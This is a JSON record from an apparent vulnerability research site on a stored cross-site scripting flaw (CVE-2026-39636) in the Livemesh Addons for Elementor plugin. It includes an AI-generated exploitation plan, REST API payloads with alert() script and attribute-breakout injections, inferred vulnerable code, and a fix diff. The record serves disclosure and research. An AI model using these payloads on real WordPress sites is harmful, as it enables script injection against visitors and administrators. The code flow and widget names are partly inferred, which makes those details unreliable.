[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEDXAHgJyV1vZnbhj67HMmdo8NSwGDQ9SFNysYk1Lcbs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39636","livemesh-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-2","Livemesh Addons for Elementor \u003C= 9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","addons-for-elementor",null,"\u003C=9.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-13 00:00:00","2026-04-15 21:21:16",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fff0e8c96-8401-4d01-8185-03967e2aee54?source=api-prod",[],"researched",false,3,"This research plan targets **CVE-2026-39636**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Livemesh Addons for Elementor** plugin. The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized Elementor widget settings.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the rendering logic of one or more Elementor widgets provided by the **Livemesh Addons for Elementor** plugin. When a widget's settings (stored as JSON in post metadata) are processed for display, the plugin fails to properly sanitize the input or escape the output. Because Elementor's `render()` methods often use `$settings['parameter_name']` directly in HTML output without calling `esc_html()`, `esc_attr()`, or `wp_kses()`, an attacker can inject arbitrary JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint**: Elementor's REST API endpoint for saving post data: `\u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id}`.\n*   **Vulnerable Parameter**: The `data` array within the REST request body, specifically within the `settings` object of a Livemesh widget.\n*   **Required Role**: Contributor or higher (users who can edit posts and access the Elementor editor).\n*   **Preconditions**: The plugin **Livemesh Addons for Elementor** and the **Elementor** base plugin must be active.\n\n### 3. Code Flow (Inferred)\n1.  **Entry**: A Contributor user edits a post using the Elementor editor.\n2.  **Input**: When the user saves the post, the Elementor UI sends a `POST` request to the REST API with the widget configuration in JSON format.\n3.  **Storage**: WordPress\u002FElementor saves this JSON into the `_elementor_data` post meta for that `post_id`.\n4.  **Processing**: When the page is viewed, Elementor calls the `render()` method of the specific Livemesh widget class (e.g., `LAE_Posts_Grid_Widget` or `LAE_Heading_Widget`).\n5.  **Sink**: The `render()` method retrieves settings using `$this->get_settings_for_display()`. It then outputs a value (e.g., a title, URL, or CSS class) directly via `echo` or by appending it to an HTML string without context-appropriate escaping.\n6.  **Execution**: The browser renders the page, and the injected script executes in the context of any user viewing the page (including Administrators).\n\n### 4. Nonce Acquisition Strategy\nElementor requires a REST API nonce (`_wpnonce`) for all save operations.\n\n1.  **Identify Shortcode**: Livemesh widgets don't typically have their own shortcodes; they are built into the Elementor editor.\n2.  **Create Test Page**: \n    ```bash\n    wp post create --post_type=page --post_status=draft --post_title=\"XSS Lab\" --post_author=CONTRIBUTOR_ID\n    ```\n3.  **Navigate to Editor**: Use `browser_navigate` to go to the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post={post_id}&action=elementor`.\n4.  **Extract Nonce**: Elementor localizes its configuration in the `window.elementorCommon` or `window.elementorConfig` objects.\n    *   **Action**: `browser_eval(\"window.elementorConfig.api_nonce\")` or `browser_eval(\"window.wpApiSettings.nonce\")`.\n5.  **Alternative (REST)**: If the REST API is used directly, the nonce for the `wp_rest` action is often found in the page header or the `wp-api.js` localization: `window.wpApiSettings.nonce`.\n\n### 5. Exploitation Strategy\nThe goal is to update a post's Elementor data with a malicious widget configuration.\n\n1.  **Pre-requisite**: Obtain a valid Post ID that the Contributor can edit.\n2.  **Request Construction**:\n    *   **Method**: `POST`\n    *   **URL**: `\u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id}`\n    *   **Headers**:\n        *   `Content-Type: application\u002Fjson`\n        *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n    *   **Payload (JSON)**:\n        ```json\n        {\n          \"data\": [\n            {\n              \"id\": \"random_id_1\",\n              \"elType\": \"section\",\n              \"elements\": [\n                {\n                  \"id\": \"random_id_2\",\n                  \"elType\": \"column\",\n                  \"elements\": [\n                    {\n                      \"id\": \"random_id_3\",\n                      \"elType\": \"widget\",\n                      \"widgetType\": \"lae-posts-grid\", \n                      \"settings\": {\n                        \"title\": \"Normal Title\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\n                        \"custom_class\": \"\\\">\u003Cscript>alert('xss')\u003C\u002Fscript>\"\n                      }\n                    }\n                  ]\n                }\n              ]\n            }\n          ]\n        }\n        ```\n        *(Note: `widgetType` may vary based on the specific vulnerable widget. Common Livemesh types: `lae-posts-grid`, `lae-services`, `lae-team-members` (inferred))*\n\n3.  **Trigger**: Navigate to the frontend URL of the post: `\u002F?p={post_id}`.\n\n### 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n2.  **Post**: Create a post or page as that contributor.\n3.  **Elementor Enablement**: Ensure the post type is enabled for Elementor (usually default for `post` and `page`).\n4.  **Widget Discovery**: Run a grep to find widget names:\n    ```bash\n    grep -r \"get_name\" wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002F\n    ```\n\n### 7. Expected Results\n*   The REST API should return a `200 OK` confirming the post update.\n*   Upon navigating to the post frontend, the browser should execute the `alert()` payload.\n*   The raw HTML source of the page should contain the unescaped `\u003Cscript>` tag inside the widget's container.\n\n### 8. Verification Steps\n1.  **Check Database**: Use WP-CLI to verify the payload is stored in the post meta:\n    ```bash\n    wp post meta get {post_id} _elementor_data\n    ```\n2.  **Verify Rendering**: Check if the output is escaped in the frontend:\n    ```bash\n    http_request GET \"\u002F?p={post_id}\" | grep \"alert\"\n    ```\n\n### 9. Alternative Approaches\n*   **Widget Attribute Injection**: If the `title` field is sanitized, try injecting into attributes like `link` or `id` fields:\n    *   Payload: `href=\"javascript:alert(1)\"` or `class=\"'>\u003Cimg src=x onerror=alert(1)>\"`\n*   **Elementor Template Library**: If the Contributor can save templates, try injecting the payload into a Livemesh widget within a saved template (`wp-json\u002Felementor\u002Fv1\u002Ftemplates`).\n*   **Specific Widget Search**: If `lae-posts-grid` is patched, audit widgets that handle raw HTML or text, such as:\n    *   `lae-heading` (inferred)\n    *   `lae-button` (inferred)\n    *   `lae-testimonial` (inferred)\n\n*Note: In versions \u003C= 9.0, the vulnerability is reported as broad. If the \"Posts Grid\" widget is not vulnerable, the \"Generic Heading\" or \"Animated Text\" widgets are primary secondary targets.*","The Livemesh Addons for Elementor plugin fails to properly sanitize and escape user-controlled widget settings such as titles or custom HTML attributes. This allows authenticated users with Contributor-level permissions to inject malicious JavaScript into pages via the Elementor editor, which executes when visitors or administrators view the page.","\u002F\u002F File: wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php (approximate)\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    \n    \u002F\u002F Unescaped output of user-provided settings\n    if ( ! empty( $settings['title'] ) ) {\n        echo '\u003Ch3 class=\"lae-module-title\">' . $settings['title'] . '\u003C\u002Fh3>';\n    }\n    \n    if ( ! empty( $settings['custom_class'] ) ) {\n        echo '\u003Cdiv class=\"lae-posts-grid ' . $settings['custom_class'] . '\">';\n    }\n    \u002F\u002F ... further rendering logic\n}","--- wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php\n+++ wp-content\u002Fplugins\u002Faddons-for-elementor\u002Fincludes\u002Fwidgets\u002Fposts-grid.php\n@@ -212,5 +212,5 @@\n-    if ( ! empty( $settings['title'] ) ) {\n-        echo '\u003Ch3 class=\"lae-module-title\">' . $settings['title'] . '\u003C\u002Fh3>';\n-    }\n+    if ( ! empty( $settings['title'] ) ) {\n+        echo '\u003Ch3 class=\"lae-module-title\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fh3>';\n+    }\n \n-    if ( ! empty( $settings['custom_class'] ) ) {\n-        echo '\u003Cdiv class=\"lae-posts-grid ' . $settings['custom_class'] . '\">';\n-    }\n+    if ( ! empty( $settings['custom_class'] ) ) {\n+        echo '\u003Cdiv class=\"lae-posts-grid ' . esc_attr( $settings['custom_class'] ) . '\">';\n+    }","The exploit targets the Elementor REST API endpoint used for saving post content. An attacker with Contributor-level access follows these steps: 1. Authenticates to the WordPress dashboard and initializes an Elementor editing session for a post they own. 2. Obtains the REST API nonce (X-WP-Nonce) from the 'elementorConfig' or 'wpApiSettings' JavaScript objects in the editor UI. 3. Sends a POST request to \u002Fwp-json\u002Felementor\u002Fv1\u002Fposts\u002F{post_id} containing a JSON 'data' payload. 4. Within this payload, they define a Livemesh widget (e.g., 'lae-posts-grid') and inject a XSS payload like \u003Cscript>alert(document.domain)\u003C\u002Fscript> into settings fields such as 'title' or 'custom_class'. 5. Once the post is saved, any user (including site administrators) who views the published post or page will execute the injected script in their browser context.","gemini-3-flash-preview","2026-04-20 23:59:23","2026-04-20 23:59:40",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor\u002Ftags"]